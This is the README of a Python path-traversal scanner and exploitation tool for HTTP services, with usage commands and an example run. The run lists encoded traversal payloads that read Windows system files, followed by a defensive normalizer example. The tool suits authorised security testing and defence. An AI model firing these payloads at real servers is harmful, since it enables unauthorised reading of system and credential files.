dotdotfarm
==========
![Version](https://img.shields.io/badge/version-1.7.2-blue?style=for-the-badge)
Utility for detection & exploitation of Path Traversal vulnerabilities in various network services
dotdotweb - PT tool for HTTP services
The tools are written in Python and use asynchronous requests (asyncio with aiohttp) together with some acceleration techniques, which allows you to make up to ~3K requests per second.
Features
--------
- asynchronous requests to speed up scanning of the target
- ability to fetch files' content once a payload succeeds
- payload can be placed in any part of the request (URL, headers or POST data)
- callbacks for handling results
Installation
============
Install from PyPI:
```bash
pip install dotdotfarm
```
You can also install it directly from the GitHub repository:
```bash
git clone https://github.com/treddis/dotdotfarm.git
cd dotdotfarm
pip3 install .
```
To upgrade the tool, run:
```bash
pip install --upgrade dotdotfarm
```
Usage
=====
```text
.___ __ .___ __ _____
__| _/_____/ |_ __| _/_____/ |__/ ____\____ _______ _____
/ __ |/ _ \ __\/ __ |/ _ \ __\ __\\__ \\_ __ \/ \
/ /_/ ( <_> ) | / /_/ ( <_> ) | | | / __ \| | \/ Y Y \
\____ |\____/|__| \____ |\____/|__| |__| (____ /__| |__|_| /
\/ \/ \/ \/
usage: dotdotweb [-h] [--version] [-V] [-A] [-R] [-o {windows,linux}]
                 [-d DEPTH] [-f FILE] [--delay DELAY]
                 [-t TIMEOUT] [-fs FS] [-fc FC] [--header HEADERS] [--data DATA]
                 url

fast path traversal identificator & exploit

positional arguments:
  url                   target URL

options:
  -h, --help            show this help message and exit
  --version             print version of the tool
  -V, --validate        validate files' content after successfull exploitation
                        (default false)
  -A, --all             try all files after successfull exploitation
                        (default false)
  -R, --print-files     read traversed files (default false)
  -o {windows,linux}, --os-type {windows,linux}
                        target OS type (default all)
  -d DEPTH, --depth DEPTH
                        depth of PT searching (default 5)
  -f FILE, --file FILE  specific file for PT detection
  --delay DELAY         make delays between requests in milliseconds (default 0)
  -t TIMEOUT, --timeout TIMEOUT
                        timeout of connections (default 60)
  -fs FS                filter output by size
  -fc FC                filter output by response code
  --header HEADERS      custom header for requests
  --data DATA           specify POST data
```
### Passing payload in GET parameters
Passing brute parameters via `?par=val` pairs:
```text
dotdotweb -o windows -fc 500 \
    "http://someserver.com:1280/newpath?testparameter=FUZZ&secondparameter=somevalue"
```
### Passing payload in headers
Passing brute parameters via `Origin: master=FUZZ` pairs:
```text
dotdotweb -o linux -fc 500,404 --header "Referer: https://www.google.com/path?q=FUZZ" \
    "http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue"
```
### Passing payload in POST data
Passing brute parameters via POST data parameters:
```text
dotdotweb -o linux -fc 500 -fs 111 --data "key0=val0&key1=val1" \
    "http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue"
```
### Using regexp to filter responses
Pass `-fs` (filter by size) or `-fc` (filter by status code) to filter out unrelated responses:
```text
dotdotweb -fc '50*,4*' -fs '18??,1834*' http://someserver.com:1234/testpath/FUZZ
```
### Launch callbacks on responses
You can launch callbacks on responses to perform checks or take other actions.
Built-in callbacks:
- validate response content using a regexp and print it (`-V`). You can pass your own regexp too!
- try all payloads even after an entry point is found (`-A`)
- read the content of traversed files and print it on screen (`-R`)
Example output
==============
```text
dotdotweb -o windows "http://localhost:8080/pathtrav?query=FUZZ"
.___ __ .___ __ _____
__| _/_____/ |_ __| _/_____/ |__/ ____\____ _______ _____
/ __ |/ _ \ __\/ __ |/ _ \ __\ __\\__ \\_ __ \/ \
/ /_/ ( <_> ) | / /_/ ( <_> ) | | | / __ \| | \/ Y Y \
\____ |\____/|__| \____ |\____/|__| |__| (____ /__| |__|_| /
\/ \/ \/ \/
[*] Started at Sun Jan 22 19:32:46 2023
../../../Windows/win.ini [Status: 200, Size: 111]
../Windows/win.ini [Status: 200, Size: 111]
..\Windows\win.ini [Status: 200, Size: 111]
..%2fWindows%2fwin.ini [Status: 200, Size: 111]
..\..\..\Windows\win.ini [Status: 200, Size: 111]
..%5c..%5c..%5cWindows%5cwin.ini [Status: 200, Size: 111]
..%5cWindows%5cwin.ini [Status: 200, Size: 111]
.%2e/Windows/win.ini [Status: 200, Size: 111]
.%2e\Windows\win.ini [Status: 200, Size: 111]
.%2e%2fWindows%2fwin.ini [Status: 200, Size: 111]
.%2e%5cWindows%5cwin.ini [Status: 200, Size: 111]
%5C..%5cWindows%5cwin.ini [Status: 200, Size: 111]
f%5C..%2fWindows%2fwin.ini [Status: 200, Size: 111]
%5C../Windows/win.ini [Status: 200, Size: 111]
%5C..\%5C..\%5C..\Windows\win.ini [Status: 200, Size: 111]
.%2e\.%2e\.%2e\Windows\win.ini [Status: 200, Size: 111]
.%2e%5c.%2e%5c.%2e%5cWindows%5cwin.ini [Status: 200, Size: 111]
%5C..%2f%5C..%2f%5C..%2fWindows%2fwin.ini [Status: 200, Size: 111]
%5C../%5C../%5C../Windows/win.ini [Status: 200, Size: 111]
%5C..%5c%5C..%5c%5C..%5cWindows%5cwin.ini [Status: 200, Size: 111]
%2e./Windows/win.ini [Status: 200, Size: 111]
%2e./%2e./%2e./Windows/win.ini [Status: 200, Size: 111]
%2e.%5cWindows%5cwin.ini [Status: 200, Size: 111]
%2e.%5c%2e.%5c%2e.%5cWindows%5cwin.ini [Status: 200, Size: 111]
.%2e%2f.%2e%2f.%2e%2fWindows%2fwin.ini [Status: 200, Size: 111]
100%|██████████████████████████████████████████████████████████| 6960/6960 [00:12<00:00, 575.63it/s]
[*] Ended at Sun Jan 22 19:32:58 2023 (11 seconds)
```
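The payload shapes in the output above all reduce to the same `..` segments once percent-encoding and backslashes are normalized, which is what a server-side check has to account for. The following is an added example, not part of dotdotfarm: a normalizer and a base-directory check run against shapes copied from that output. `BASE_DIR` and the function names are assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

BASE_DIR = "/srv/app/files"  # hypothetical directory the service is allowed to serve

def normalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (covers double encoding) and unify separators."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def is_traversal(value: str) -> bool:
    """True if any path segment equals '..' after normalization."""
    return ".." in normalize(value).split("/")

def safe_resolve(value: str, base: str = BASE_DIR) -> Optional[str]:
    """Return the path under base named by value, or None if it escapes base.

    Lexical check only; resolve symlinks (os.path.realpath) before opening
    anything on a real filesystem.
    """
    candidate = posixpath.normpath(posixpath.join(base, normalize(value)))
    if candidate.startswith(base + "/"):
        return candidate
    return None

# Shapes taken from the example output above.
SAMPLES = [
    "../../../Windows/win.ini",
    "..%2fWindows%2fwin.ini",
    "..%5c..%5c..%5cWindows%5cwin.ini",
    ".%2e\\Windows\\win.ini",
    "%5C..%2f%5C..%2f%5C..%2fWindows%2fwin.ini",
    "%2e.%5c%2e.%5c%2e.%5cWindows%5cwin.ini",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:50} traversal={is_traversal(sample)} "
              f"resolved={safe_resolve(sample)}")
```

A plain substring match on `../` misses most of these shapes; decoding first and comparing whole segments catches them without flagging names such as `notes..txt`.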